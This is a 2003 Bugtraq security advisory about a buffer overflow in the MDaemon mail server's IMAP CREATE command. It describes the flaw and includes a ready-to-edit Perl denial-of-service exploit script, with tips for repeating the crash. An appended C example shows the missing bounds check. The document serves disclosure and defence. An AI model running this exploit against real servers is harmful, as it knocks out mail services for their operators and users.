Message-ID: <1548902631.20030426202701@mail.ru>
Date: Sat, 26 Apr 2003 20:27:01 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urityfocus.com
Subject: MDaemon SMTP/POP/IMAP server  =>v.6.7.5: IMAP buffer overflow


-----BEGIN PGP SIGNED MESSAGE-----

########################################################*
#       Damage Hacking Group security advisory
#                   www.dhgroup.org
########################################################*
#Product: MDaemon SMTP/POP/IMAP server =>v.6.7.5
#Authors: Alt-N Technologies [www.mdaemon.com]
#Vulnerability: remote buffer overflow in IMAP service
########################################################*

#Overview#-----------------------------------------------------#
- From the help file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs
of any number of individual users and comes complete with a powerful
set of integrated tools for managing mail accounts and message
formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

#Problem#------------------------------------------------------#
A remote buffer overflow was found in the MDaemon IMAP service.
A remote authorized user can execute arbitrary code on the
server with SYSTEM privileges.
The "Create" command of the IMAP server does not have proper bounds
checking, enabling a user to shut down the service remotely. It
should be noted that a user account is required.
A remote authorized user may create a new mailbox via the IMAP service
with a mailbox name of more than 1Kb. As a result, SMTP/POP/IMAP/LDAP
will crash, but WorldClient and WebAdmin will work normally.
For example:
0 CREATE AAAAAAA..[1kb]..AAA
When we send "0 CREATE AAAAAAA..[1kb]..AAA", the server creates
a mailbox with the name " AAAAA.. [202b..] AAA " and crashes. We
cannot attack a second time in exactly the same way, because the
server will consider that the mailbox "AAAAA...AAA" is already
created and will refuse to process the command. To bypass this, we
must change any character among the first 202 characters (for
example, create " BAAAAAA... AA" or "BBBBBBB...BB" instead of
"AAAAA... AA").
The vulnerability may be used to execute arbitrary code (the remote
user can cause the EAX and EDI registers to be overwritten with
arbitrary data). All code will be run with system privileges (if
MDaemon is installed as a system service).

#Exploit#------------------------------------------------------#

#!/usr/bin/perl
###############
#MDaemon SMTP/POP/IMAP server v.6.7.5
#Remote DoS exploit
##Edit this stuff:
$host = "imap_server";
$port = "143";
$login = "login";
$pass = "pass";
#Attention! If exploit doesn't
#work, change this:
$data = "A";
###############
use IO::Socket;
$num = "1000";
$buf .= $data x $num;
print "Connecting... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
print " OK\n";
print "Attacking... ";
print $socket "DHGroup Login $login $pass\n";
sleep(1);
print $socket "DHGroup CREATE $buf\n";
sleep(1);
print " OK\n";
print "Exiting... \n";
close($socket);
##//www.dhgroup.org//
#EOF

PS. thx to PIG_KILLER [www.securitylab.ru]

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
-----END PGP SIGNATURE-----
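
The missing bounds check the advisory describes, shown from the server side as an added example (not MDaemon's code and not part of the original message): a CREATE parser that checks the mailbox name length before copying. The function names, the 128-byte limit and the status codes are assumptions for illustration, and only the unquoted "tag CREATE name" form is handled.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

#define MAX_MAILBOX_LEN 128  /* assumed policy limit, not MDaemon's real buffer size */
enum create_status { CREATE_OK = 0, CREATE_MALFORMED = -1, CREATE_TOO_LONG = -2 };

/* Parse "<tag> CREATE <mailbox>" and copy the name into out. The length is
 * checked against the limit and the destination size before any byte is
 * copied, so an oversized name is rejected instead of overrunning out. */
enum create_status parse_create(const char *line, char *out, size_t out_size)
{
    if (line == NULL || out == NULL || out_size == 0)
        return CREATE_MALFORMED;
    const char *p = strchr(line, ' ');          /* end of the command tag */
    if (p == NULL || p == line)
        return CREATE_MALFORMED;
    p++;
    if (strncasecmp(p, "CREATE ", 7) != 0)      /* IMAP keywords are case-insensitive */
        return CREATE_MALFORMED;
    p += 7;

    size_t len = strcspn(p, "\r\n");            /* name runs to end of line */
    if (len == 0)
        return CREATE_MALFORMED;
    if (len > MAX_MAILBOX_LEN || len >= out_size)
        return CREATE_TOO_LONG;                 /* reject, never truncate or overrun */
    memcpy(out, p, len);
    out[len] = '\0';
    return CREATE_OK;
}

/* Constructed input: "0 CREATE " followed by n 'A' bytes, as in the advisory. */
enum create_status try_name_of_length(size_t n)
{
    static char line[2048];
    char out[MAX_MAILBOX_LEN + 1];
    if (n > sizeof line - 16)
        return CREATE_MALFORMED;
    memcpy(line, "0 CREATE ", 9);
    memset(line + 9, 'A', n);
    memcpy(line + 9 + n, "\r\n", 3);            /* CRLF plus terminating NUL */
    return parse_create(line, out, sizeof out);
}

int main(void)
{
    printf("%d %d\n", try_name_of_length(16), try_name_of_length(1000));
    return 0;
}
```

Returning a distinct CREATE_TOO_LONG status lets the server answer with a tagged NO and log the attempt, which also gives operators a signal for oversized CREATE arguments.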